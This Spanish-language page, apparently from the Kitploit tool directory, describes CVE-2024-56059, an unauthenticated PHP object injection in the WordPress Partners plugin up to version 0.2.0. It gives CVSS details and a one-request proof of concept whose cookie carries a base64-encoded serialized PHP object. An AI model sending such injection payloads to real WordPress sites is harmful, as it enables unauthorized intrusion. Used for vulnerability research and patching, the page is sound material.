Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-56059 — Partners <= 0.2.0 - Inyección de Objetos PHP No Autenticado | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-56059
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubrandomrobbiebf/cve-2024-56059

CVE-2024-56059

Partners <= 0.2.0 - Inyección de Objetos PHP No Autenticado

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-56059

Partners <= 0.2.0 - Inyección de Objetos PHP No Autenticada

Descripción

El plugin Partners para WordPress es vulnerable a la Inyección de Objetos PHP en versiones hasta la 0.2.0 inclusive, a través de la deserialización de entrada no confiable. Esto permite que atacantes no autenticados inyecten un Objeto PHP. No hay una cadena POP conocida presente en el software vulnerable. Si hay una cadena POP presente a través de un plugin o tema adicional instalado en el sistema objetivo, podría permitir al atacante eliminar archivos arbitrarios, recuperar datos sensibles o ejecutar código.

Detalles

  • Tipo: plugin
  • Slug: partners
  • Versión afectada: 0.2.0
  • Puntuación CVSS: 9.8
  • Clasificación CVSS: Crítica
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-56059
  • Estado: Activo

POC

root@kitploit:~
GET /partners/ HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: mighty_partners_login=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=
Descargar herramienta